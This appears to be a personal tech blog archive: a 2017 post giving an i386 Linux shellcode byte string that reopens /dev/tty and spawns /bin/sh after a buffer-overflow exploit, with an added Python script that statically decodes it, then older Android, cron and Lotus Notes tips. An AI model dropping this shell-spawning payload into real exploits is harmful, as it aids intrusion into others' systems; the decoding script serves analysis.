12 March 2017

Shellcode that brings back tty input



There are cases where you think you have managed to exploit a bug (e.g. a buffer overflow), but the program terminates right away and you can do nothing with your shellcode.
One of the reasons is that your shellcode does not bring back the input terminal, so you cannot type your commands.
The solution is to try another shellcode, like the one below. It "closes stdin descriptor and re-opens /dev/tty, then does an execve() of /bin/sh/".
"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
Origin
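The following is an added example, not part of the original post: a static triage that treats the byte string above purely as data (it is never executed) and recovers the syscall order and the stack-built strings, confirming the quoted description. The function names and the small i386 syscall subset are this example's own choices.

```python
# Added example: static triage of the i386 Linux byte string quoted in the post.
# The bytes are only scanned as data, never executed.
SHELLCODE = (
    b"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9"
    b"\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3"
    b"\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
)

# Subset of the i386 Linux syscall numbers (asm/unistd_32.h).
SYSCALLS = {1: "exit", 3: "read", 4: "write", 5: "open", 6: "close",
            11: "execve", 63: "dup2"}


def syscall_sequence(code):
    """Return syscall names for every `mov al, imm8; int 0x80` pair, in order."""
    names = []
    for i in range(len(code) - 3):
        if code[i] == 0xB0 and code[i + 2:i + 4] == b"\xcd\x80":
            names.append(SYSCALLS.get(code[i + 1], "sys_%d" % code[i + 1]))
    return names


def pushed_strings(code):
    """Rebuild strings assembled on the stack by runs of `push imm32` (0x68)."""
    strings, run, i = [], [], 0
    while i < len(code):
        if code[i] == 0x68 and i + 5 <= len(code):
            run.append(code[i + 1:i + 5])   # the 4-byte immediate
            i += 5
            continue
        if run:
            # The stack grows down, so the last dword pushed is the string's start.
            strings.append(b"".join(reversed(run)).decode("ascii", "replace"))
            run = []
        i += 1
    if run:
        strings.append(b"".join(reversed(run)).decode("ascii", "replace"))
    return strings


def reopens_tty(code):
    """True for the close -> open -> execve pattern that rebuilds /dev/tty."""
    seq = syscall_sequence(code)
    return seq == ["close", "open", "execve"] and "/dev/tty" in pushed_strings(code)
```

Because close(0) frees descriptor 0 and open() returns the lowest free descriptor, the re-opened /dev/tty becomes the new stdin that the shell inherits.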

25 February 2011

Gingerbread (Android 2.3.3) for Nexus One - GRI40


I just could not wait until my phone got the OTA update from Google. :p

So, I decided to update it manually.

And here is the link for anyone who wants to taste the latest Gingerbread (Android 2.3.3 - GRI40).
(For a Nexus One running Froyo FRG83G only.)

If you get a failure message while updating, maybe you could update the Hboot first. (The required version of Hboot is 0.35.0017.)
Enjoy!


20 June 2010

Latest of Android 2.2 Froyo - FRF72


I've just updated my N1 to the latest of Android 2.2 (Froyo), build number: FRF72.

You can find the official release package on the Google server, here:

(Requirement: you are running Froyo FRF50!)


08 April 2010

How to change SMSC number of Android

Changing the SMSC (Short Message Service Center) number is necessary when you go to another country (for a business trip or travel) and still want to send SMS (SMS roaming).

Basically, Android phones have NO setting or application to do this. But I found a tip.

Here you are:

1. Go to Phone Dialer, and press: *#*#4636#*#*
2. Select Phone information
3. Scroll down to bottom of the screen, you'll see the field for SMSC setting.
4. [Optional] Click Refresh to see current SMSC number.
5. Change the SMSC number as you want. Then, click Update.

That's it!

P/S: I checked on my Nexus One. Maybe on other Android phones it's a little bit different. But the code is the same: *#*#4636#*#*

05 January 2010

Auto-shutdown for Linux machine

If you want to schedule more than just a shutdown, crontab is the tool generally used for running commands on a recurring schedule.

You need to be root:

# su

Then, type root's password:

Password:

Then, use this command:

# crontab -e

Add the following line:

55 18 * * * /sbin/shutdown -h 19:00

It will automatically shut down the computer at 19:00 every day (after warning users at 18:55).

To make it work immediately, you need to restart the cron service:

# /etc/init.d/crond restart

That's it. :)

03 November 2009

Setting proxy for Android by GUI (official way)

UPDATE: [2010-05-21] It works with Froyo (Android 2.2)

If you read my earlier post, you may already know the way to set a proxy for Android (1.6 and earlier versions).

But that is the "unofficial way": you need to modify something (the settings.db file) in the core system of Android, and you must "restart" the emulator to make it take effect.

Now, I found a new way, a very simple one (I don't know why I haven't found it before). You can use the Android GUI to set the proxy, and it works immediately.

(Note: this guideline is for all versions before 2.0 only. It does NOT work with Eclair, and I don't know the reason >"<. [---Update: It works with Froyo---] )

1. Firstly, go to the Settings menu, then select Wireless controls



2. In the Wireless controls menu, select Mobile networks,



3. Then, select Access Point Names


4. Press Menu hard key, then select New APN


5. Fill in the information for your proxy, e.g.:


Name: YourProxyName
APN: internet
Proxy: your.proxy.server.com
Port: 8080

(You can use your own proxy host and port for Proxy and Port fields)

6. Press Menu hard key, then select Save.


7. You will be returned to the Mobile network settings menu. Select Access Point Names again and select your new APN to activate it.


8. Press the Home hard key to return to the Home screen. Go to the Browser application.
Now you can use your own proxy for the Android browser.



Have fun! ^^

15 September 2009

How to get EMMA code coverage of Android

Here are some basic steps for getting EMMA code coverage of Android.

Thanks to Brett Chabot and Gabor for useful support at the Android Developer Group.

Before doing these steps, you need to get the full source code of Android (follow this link for more details )

After that, go to the root folder of the Android source code and follow the instructions below exactly.

A. Generating code coverage using runtest script

1. Firstly, you need to add the target system/framework/emma.jar to the device's boot classpath. To do so, modify the BOOTCLASSPATH variable in /system/core/rootdir/init.rc .

a. Open /system/core/rootdir/init.rc

b. The system/framework/emma.jar entry needs to be added in the exact position shown below:
export BOOTCLASSPATH=/system/framework/core.jar:/system/framework/ext.jar:/system/framework/emma.jar:/system/framework/framework.jar:/system/framework/android.policy.jar:/system/framework/services.jar

c. Save and close init.rc file

2. Since EMMA will save the coverage result to the SD card, you need to ensure that the SD card can be mounted properly. To do so:

a. Open this file: build/core/main.mk

b. Ensure that these lines are already present (around lines 212 to 219); if not, add them yourself!
# Install a vold.conf file is one's not already being installed.
ifeq (,$(filter %:system/etc/vold.conf, $(PRODUCT_COPY_FILES)))
PRODUCT_COPY_FILES += \
development/data/etc/vold.conf:system/etc/vold.conf
ifeq ($(filter eng tests,$(TARGET_BUILD_VARIANT)),)
$(warning implicitly installing vold.conf)
endif
endif

(Please follow this link for more details )

3. Build the bootimage to pick up the init.rc changes
make bootimage

4. Build a full system image
make -j4

5. Make EMMA
export EMMA_INSTRUMENT=true

make emma

6. Start emulator
[path_to_SDK_tools]/emulator -sdcard [path_to_your_sdcard]

7. Next, use the runtest.py script. Runtest will do all the necessary steps to instrument your test and target package, run the test, and generate the code coverage report.
cd [path_to_android_source_code]

python development/testrunner/runtest.py --coverage [Test_package]

[Test_package] can be: apidemos, core, music, email... (Leave this option empty to see the list).

8. After the script finishes, the coverage report will be generated and saved into the

[path_to_Android_source_code]/out/emma/

folder. You can find an HTML report of EMMA code coverage for [Test_package] there.

=========================================================

B. Generating code coverage for your own test

If you want to run code coverage for your own test, please follow the steps described above, but skip steps 6 to 8 and continue (after step 5) with step 9 shown below:

9. Set up the environment and the additional bash commands (like m, mm, mmm, choosecombo, etc.). Notice the space after the dot!
. build/envsetup.sh

10. Set the ANDROID_PRODUCT_OUT directory for the emulator to know the image location
export ANDROID_PRODUCT_OUT=[path_to_Android_source_code]/out/target/product/generic

This step is important: it tells the emulator where to find the images it needs to be synchronized with.

11. Set EMMA_INSTRUMENT to true
export EMMA_INSTRUMENT=true

12. Compile the application you would like to instrument
mmm development/samples/[your_project]

(You can use apidemos for example)

After running this step, new images can be generated and saved into ANDROID_PRODUCT_OUT (from step 10).

13. Run emulator
[path_to_SDK_tools]/emulator -sdcard [path_to_your_sdcard]

14. Remount the drive. A writable drive is needed; without that, sync won't work.
adb remount

15. Synchronize the local content (new images) with the emulator
adb sync

16. Run instrumentation
adb shell am instrument -w -e coverage true [source_code_of_test]

Here is an example for apidemos:
adb shell am instrument -w -e coverage true com.example.android.apis.tests/android.test.InstrumentationTestRunner

See this for more details of InstrumentationTestRunner options.

17. This command will dump a runtime coverage data file at /sdcard/coverage.ec on the device.

Extract it to the local host:
adb pull /sdcard/coverage.ec coverage.ec

18. Now generate a coverage report. You'll need to pass in the path to the coverage metadata generated at build time.
java -cp external/emma/lib/emma.jar emma report -r html -in coverage.ec -sp [path_to_your_project_source_code] -in out/target/common/obj/APPS/[your_project]_intermediates/coverage.em

Here is an example for apidemos:
java -cp external/emma/lib/emma.jar emma report -r html -in coverage.ec -sp development/samples/ApiDemos/src -in out/target/common/obj/APPS/ApiDemos_intermediates/coverage.em

19. Now, you will get the HTML report of EMMA code coverage for your own project.

Check it out!


Notes: The first time you run the instrumentation (step 7 or 16), the Android system may crash. But don't worry, it will automatically restart. Then you can run the instrumentation again successfully!

How to set proxy for Android (updated for 1.5 and 1.6_r1 versions)

Here is a tutorial on reconfiguring the settings of Android to use a proxy for Internet connections.
Basically, we need to modify the content of the settings.db file in /data/data/com.android.providers.settings/databases/ of Android.

So, we can follow these steps:

1. Go into the SDK tools folder
cd [path_to_SDK_folder]/tools
then start the emulator.

2. Get the settings.db file from Android:
adb pull /data/data/com.android.providers.settings/databases/settings.db settings.db

3. Use SQLite3 to modify it:

a. If you are using Android SDK version 1.1 or lower, then use:
sqlite3 settings.db "INSERT INTO system VALUES(99,'http_proxy','[proxy_host]:[proxy_port]');"

b. If you are using Android SDK version 1.5 or higher, then use:
sqlite3 settings.db "INSERT INTO secure (name, value) VALUES('http_proxy','[proxy_host]:[proxy_port]');"

4. Put it back into Android:
adb push settings.db /data/data/com.android.providers.settings/databases/settings.db

5. Restart the emulator. Then we can use the proxy setting for Internet connections.
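A check to run on the pulled settings.db, before pushing it back or when reviewing an image for an unexpected proxy, is sketched below as an added example (not from the original post). It looks for http_proxy rows in both tables named in step 3; the column names _id, name and value, the sample rows and the host proxy.example.test are assumptions constructed for the example.

```python
import sqlite3

# Tables the post writes to: `system` (SDK 1.1 or lower), `secure` (SDK 1.5 or higher).
PROXY_TABLES = ("system", "secure")


def find_http_proxy(db):
    """Return (table, host, port) per http_proxy row; port is None if malformed."""
    present = {r[0] for r in
               db.execute("SELECT name FROM sqlite_master WHERE type='table'")}
    hits = []
    for table in PROXY_TABLES:
        if table not in present:
            continue  # the table may not exist in this SDK version's schema
        # `table` comes from the fixed tuple above, never from user input.
        rows = db.execute("SELECT value FROM %s WHERE name = 'http_proxy'" % table)
        for (value,) in rows:
            host, _, port = (value or "").rpartition(":")
            if host and port.isdigit():
                hits.append((table, host, int(port)))
            else:
                hits.append((table, value, None))
    return hits


def sample_db(with_secure):
    """Constructed in-memory stand-in for a pulled settings.db (columns assumed)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE system (_id INTEGER PRIMARY KEY, name TEXT, value TEXT)")
    db.execute("INSERT INTO system VALUES (1, 'screen_brightness', '102')")
    if with_secure:
        db.execute("CREATE TABLE secure (_id INTEGER PRIMARY KEY, name TEXT, value TEXT)")
        db.execute("INSERT INTO secure (name, value) "
                   "VALUES ('http_proxy', 'proxy.example.test:8080')")
    else:
        db.execute("INSERT INTO system VALUES (99, 'http_proxy', 'proxy.example.test:3128')")
    return db


if __name__ == "__main__":
    for flag in (False, True):
        print(find_http_proxy(sample_db(flag)))
```

For a real file, pass `sqlite3.connect("settings.db")` to `find_http_proxy` instead of the constructed sample.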

Lotus Notes: This database cannot be read due to an invalid on disk structure

Error message: "This database cannot be read due to an invalid on disk structure".

How to fix it?

1. Open the Workspace by clicking the icon on the left side
2. Right-click the Email icon (Local) on the Workspace --> "Remove From Workspace"
3. Right-click again, this time on the Email icon (Server) --> "Replication" --> "New Replica..."
4. Select a new file or replace the old one to replicate the database from server to local
5. Wait...
6. When replication has finished --> Have fun!

31 May 2009

Duy KHUONG wants to share their location with you on Google Latitude

Duy KHUONG (duykham@gmail.com) wants to start sharing their location with you on Google Latitude. You need to sign in to Latitude with a Google Account (e.g., @gmail.com) and invite Duy KHUONG. To get started, or to learn more about Latitude, click the link below. To get Google Latitude on your phone, click or type in the link below from your mobile web browser.

http://m.google.com/latitude?dc=lati

